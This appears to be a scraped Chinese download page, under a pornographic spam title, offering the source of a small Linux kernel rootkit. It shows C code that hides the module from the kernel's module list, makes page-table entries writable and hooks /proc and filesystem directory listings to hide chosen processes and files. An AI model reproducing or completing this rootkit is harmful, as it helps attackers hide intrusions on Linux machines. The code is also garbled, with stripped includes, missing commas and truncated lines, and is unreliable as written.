91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

資源簡介

一個小型的linux rootkit源碼 可以實現(xiàn)模塊隱藏 進程隱藏等一些基本功能 也可以用做學(xué)習(xí)

資源截圖

代碼片段和文件信息 

#include?
#include?
#include?
#include?
#include?
#include?

#define?MIN(ab)?\
???({?typeof?(a)?_a?=?(a);?\
??????typeof?(b)?_b?=?(b);?\
?????_a?

#define?MAX_PIDS?50

MODULE_LICENSE(“Dual?BSD/GPL“);
MODULE_AUTHOR(“Arkadiusz?Hiler“);
MODULE_AUTHOR(“Michal?Winiarski“);

//STATIC?VARIABLES?SECTION
//we?don‘t?want?to?have?it?visible?in?kallsyms?and?have?access?to?it?all?the?time
static?struct?proc_dir_entry?*proc_root;
static?struct?proc_dir_entry?*proc_rtkit;

static?int?(*proc_readdir_orig)(struct?file?*?void?*?filldir_t);
static?int?(*fs_readdir_orig)(struct?file?*?void?*?filldir_t);

static?filldir_t?proc_filldir_orig;
static?filldir_t?fs_filldir_orig;

static?struct?file_operations?*proc_fops;
static?struct?file_operations?*fs_fops;

static?struct?list_head?*module_previous;
static?struct?list_head?*module_kobj_previous;

static?char?pids_to_hide[MAX_PIDS][8];
static?int?current_pid?=?0;

static?char?hide_files?=?1;

static?char?module_hidden?=?0;

static?char?module_status[1024];

//MODULE?HELPERS
void?module_hide(void)
{
	if?(module_hidden)?return;
	module_previous?=?THIS_MODULE->list.prev;
	list_del(&THIS_MODULE->list);
	module_kobj_previous?=?THIS_MODULE->mkobj.kobj.entry.prev;
	kobject_del(&THIS_MODULE->mkobj.kobj);
	list_del(&THIS_MODULE->mkobj.kobj.entry);
	module_hidden?=?!module_hidden;
}
?
void?module_show(void)
{
	int?result;
	if?(!module_hidden)?return;
	list_add(&THIS_MODULE->list?module_previous);
	result?=?kobject_add(&THIS_MODULE->mkobj.kobj?THIS_MODULE->mkobj.kobj.parent?“rt“);
	module_hidden?=?!module_hidden;
}

//PAGE?RW?HELPERS
static?void?set_addr_rw(void?*addr)
{
	unsigned?int?level;
	pte_t?*pte?=?lookup_address((unsigned?long)?addr?&level);
	if?(pte->pte?&~?_PAGE_RW)?pte->pte?|=?_PAGE_RW;
}

static?void?set_addr_ro(void?*addr)
{
	unsigned?int?level;
	pte_t?*pte?=?lookup_address((unsigned?long)?addr?&level);
	pte->pte?=?pte->pte?&~_PAGE_RW;
}

//CALLBACK?SECTION
static?int?proc_filldir_new(void?*buf?const?char?*name?int?namelen?loff_t?offset?u64?ino?unsigned?d_type)
{
	int?i;
	for?(i=0;?i?		if?(!strcmp(name?pids_to_hide[i]))?return?0;
	}
	if?(!strcmp(name?“rtkit“))?return?0;
	return?proc_filldir_orig(buf?name?namelen?offset?ino?d_type);
}

static?int?proc_readdir_new(struct?file?*filp?void?*dirent?filldir_t?filldir)
{
	proc_filldir_orig?=?filldir;
	return?proc_readdir_orig(filp?dirent?proc_filldir_new);
}

static?int?fs_filldir_new(void?*buf?const?char?*name?int?namelen?loff_t?offset?u64?ino?unsigned?d_type)
{
	if?(hide_files?&&?(!strncmp(name?“__rt“?4)?||?!strncmp(name?“10-__rt“?7)))?return?0;
	return?fs_filldir_orig(buf?name?namelen?offset?ino?d_type);
}

static?int?fs_readdir_new(struct?file?*filp?void?*dirent?filldir_t?filldir)
{
	fs_filldir_orig?=?filldir;
	return?fs_readdir_orig(filp?dirent?fs_filldir_new);
}

評論

共有 條評論